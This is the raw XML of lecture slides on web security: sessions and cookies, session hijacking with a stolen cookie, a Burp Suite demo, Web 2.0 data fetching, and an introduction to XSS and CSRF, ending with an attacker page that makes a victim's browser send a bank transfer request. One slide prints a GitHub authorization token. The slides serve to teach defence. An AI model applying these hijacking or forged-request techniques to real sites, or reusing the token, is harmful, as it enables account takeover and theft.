        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a new session (thereby, issue a new cookie) after a successful login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session.regenerate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() will issue a new cookie and then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() puts the following information to the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7FDE6-1766-52D5-08B4-42F98622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A60139C-D94A-AB87-CF0A-8578CC6CC8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957" y="2368403"/>
            <a:ext cx="7772400" cy="117489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E1D2114-CB06-68BB-24BD-BBEE96AF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957" y="4913767"/>
            <a:ext cx="5232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38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BE27E-9EDD-22C1-5032-9DB0B302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Users are Connecting to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTFd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18781-7E77-7171-1C0B-07DAF171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login-required pages are checking the ‘id’ of the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77A81-F53E-0676-B053-CE185190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32DBC37-1D1E-12EA-D890-9AF097FD9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5257800"/>
            <a:ext cx="5232400" cy="1600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FB6DBEC-B980-EB9D-E584-C167AE34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87600"/>
            <a:ext cx="54610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B1977EE-5FA3-A28B-C71B-D0307DB46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5" y="4605337"/>
            <a:ext cx="5384800" cy="7112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8A330EB-7668-DDD4-22EB-D905864834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6742" y="2387600"/>
            <a:ext cx="5031922" cy="23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1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5CCD-5C76-4064-8551-840085E7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Logout?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A7026-C372-E130-8088-94AF0A4E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Logout removes all data from the session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Thereby, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() will return always False after logout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7F5EB-CAD7-541F-EBC8-9574ACA2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6B30F38-AEFD-5D90-80B2-9AD8429D4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2307771"/>
            <a:ext cx="6400800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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A5F8810-F381-AB10-5990-F81A8BBD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1" y="3805917"/>
            <a:ext cx="2578100" cy="5588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DC0B34C8-AD2D-4CFD-415C-2CA1419A5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71" y="4915240"/>
            <a:ext cx="5384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B836-73B5-F32B-467D-86EFD5FF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a Cookie is Stolen?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34D8-3BED-3AD4-2233-9EA63567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malicious client may send cookie stolen from a victim…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0305-7D0A-548D-226C-57C03968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Apps internet web browser Icon | Oxygen Iconset | Oxygen Team">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB5DA24-3F51-E08A-4A08-F8F92F7E7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4879" y="4488997"/>
            <a:ext cx="1613807" cy="16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What is a Web Server and What is it used for? – Lizzie's Website">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217812E-46D4-BC3D-AC58-C6E62A59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7150" y="3733800"/>
            <a:ext cx="2603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425050-48E2-3778-5128-752F5B487019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2728686" y="5204725"/>
            <a:ext cx="6088743" cy="369"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000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616E6D-BF64-A3B0-2968-99226C50A679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342493" y="5204725"/>
            <a:ext cx="25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Protected by TLS (HTTPS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Database - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112248A0-9809-A915-6C5A-6AD75BFB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2379" y="2251876"/>
            <a:ext cx="1475475" cy="14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F4012D-7387-A6F7-DE7D-5AD4532B69BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3424426"/>
            <a:ext cx="4590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/user-info HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com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Cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9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F43046-CC20-2693-84D4-E756E22AFF9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807748" y="6225890"/>
            <a:ext cx="207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example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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2FD9DF-B273-6B4A-E73D-1B2D7E09958F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321364" y="2251876"/>
            <a:ext cx="3047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will fetch the username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>username = sessions[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if username == None:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login_failed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5269D-2A2A-E457-4910-857B5935D92E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525001" y="4297953"/>
            <a:ext cx="2003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OK HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Malware Icon | Malware Iconset | Hopstarter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34C960F-AA4E-C6AD-8D68-F25F465F9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553" y="4759618"/>
            <a:ext cx="1210583" cy="121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6071C9-B661-5B31-E0FB-21479D0A1AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-22171" y="4246797"/>
            <a:ext cx="291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Cookie stolen from a victim…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37615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9844 0 " pathEditMode="relative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-0.39349 0.2233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74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/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="13" grpId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E5F5-59C9-DEFF-7159-61DC7916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7AEB-71FE-1755-5D1E-C4A08FE2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Attackers may steal a victim’s cookie to hijack valid sessions in the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This happens because server maintains all the client’s state with a single token, the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie is transferred via HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we do not use HTTPS, then any middlemen can see/steal the cookie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02E6C-C5E9-3C42-040B-27D54C2E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BF860-9A13-6473-56F0-16D422391265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3641271"/>
            <a:ext cx="5774871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Implication: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Stealing a cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stealing an active login sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thereby, we need to regard cookie as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security credential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protect abusing of it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379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F661-D3BA-FD3A-0FF6-FA4FBFA7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Hijacking Demo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F8EF-FDF1-A873-B16F-9E2B2FA9F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Firefox and Burp Suite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/burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can set the proxy in Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To let Burp Suite catch all the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9C9E9-6A4E-83C9-4F2F-99AD962A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8667CC-F786-3287-78F4-06B80E7B48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814" y="3017636"/>
            <a:ext cx="5840186" cy="38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25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58EE-863D-26F0-FA4C-79B2EDE0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Web Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Isseus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63AE-BC72-827A-2E55-A74F04C60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Cross-site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do something on behalf of the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the current web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do something on behalf of the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the current/other web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BD0DD-C210-2359-1813-744A88BC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1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2307-DDEB-9179-CEFE-D61A3C10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F46C-B43A-EF20-9868-F47F6E81E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1.0 was just sending HTTP document, and that’s it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications are not programs; just an HTML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do not have network functionalities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canott</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fetch new data…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does this mean?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client: send an HTTP request to /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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: send the HTML document for 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There is no way that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server can initiate communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no way that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client fetch new data from the server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B51F8-1B38-BFB8-2AED-9ABC08C1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91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82307-DDEB-9179-CEFE-D61A3C10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Features Cannot Be Supported by Web 1.0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4040D0-D0D5-D1CD-207A-52D2623DF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057" y="2486024"/>
            <a:ext cx="3756492" cy="38703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B51F8-1B38-BFB8-2AED-9ABC08C1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C73C3-93C2-21B2-FD11-940700C1E85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3424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facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dynamically fetches new notifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Web 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no way that server let the browser know there is a notification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 is no standard way that the client can check the server and update web content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255818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BB7D-FDD8-E8B5-8E57-A7952259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1E9D1-BEE9-1957-4CEA-29B2E899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Added dynamic network data fetching support in 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Purpose: Make web runs interactive apps, not just show the static webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r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 err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code can now fetch new data from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WebSocket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A server can ping the web browser to let them fetch new data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many more features are available: WebRTC, WebGL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebCL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42AC7-46C4-2234-15B9-9E3F4B1B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9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8BA8F-DC85-039F-901D-0F46CEDB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AF1B2-E1F5-5880-2BCB-AD518B03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use HTTP Basic Authentication for logging into the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead, we use the login form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does it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639E2-104B-F107-14FB-FEDC2AC8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4F12F4-6449-0112-011F-8F99B7781D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515" y="2928608"/>
            <a:ext cx="4455886" cy="373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64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A1A8-5E24-F15D-37E6-F0DD0826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New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A83F5-8A3A-2B46-39E5-F3F5EC5EB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Client fetches /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server sends the HTML data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client fetches /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jquery.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> code that can query new web data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Server sends /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>js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ym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>jqeury.js</a:t>
            </a:r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Client runs its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>index.html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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> and run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Fetch data from /notifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Fetch data from /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>chattings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Etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Do this in every 10 secs, or whenever server notifies the client..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C9B78-D8AC-2295-704B-53520040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7D7AE8-03DB-B427-59E5-73D3EC8699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3857" y="3524282"/>
            <a:ext cx="2443692" cy="25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98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2D03-A20C-A7DD-40DB-D2FB82EE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0673-EDCF-9E4A-EF06-1F6C54C03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code will access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://api.github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization: token 5bdb626c5f600f67457b2a406b96b017aa8220b5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21F-6695-AD89-5CDE-D6C6118B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2E532-D3BE-2382-9FDC-313C40BE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72" y="1423194"/>
            <a:ext cx="7543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2D03-A20C-A7DD-40DB-D2FB82EE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0673-EDCF-9E4A-EF06-1F6C54C03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code will access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://api.github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization: token 5bdb626c5f600f67457b2a406b96b017aa8220b5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21F-6695-AD89-5CDE-D6C6118B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2E532-D3BE-2382-9FDC-313C40BE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72" y="1423194"/>
            <a:ext cx="7543800" cy="2578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F1FFD0-B42C-D547-CDAF-A872C4EECA2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3641271"/>
            <a:ext cx="5774871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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Web 2.0 and onward,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code can fetch new data from web servers…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328054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AA66-B37C-B6DE-39DC-F07ABF983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X (Cross) S (Site) S (Scripting) Attack?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74611-DD85-79EC-AC79-DA79A89B7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XSS (Cross-site Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers may inject code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can send HTTP requests using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser will use the stored cookie for the target website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the same credentials on your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can we exploit this?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19F-DDAD-B9D3-AF00-88FA04D7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95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E522-28C4-89DE-EC58-DA2A0AFC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Code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52FB-8F5E-5E26-9E9D-B579048CE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create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and you can put any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code there..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ask victims to visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attack.com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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send a HTTP request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://some_bank_website.com/send_money</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
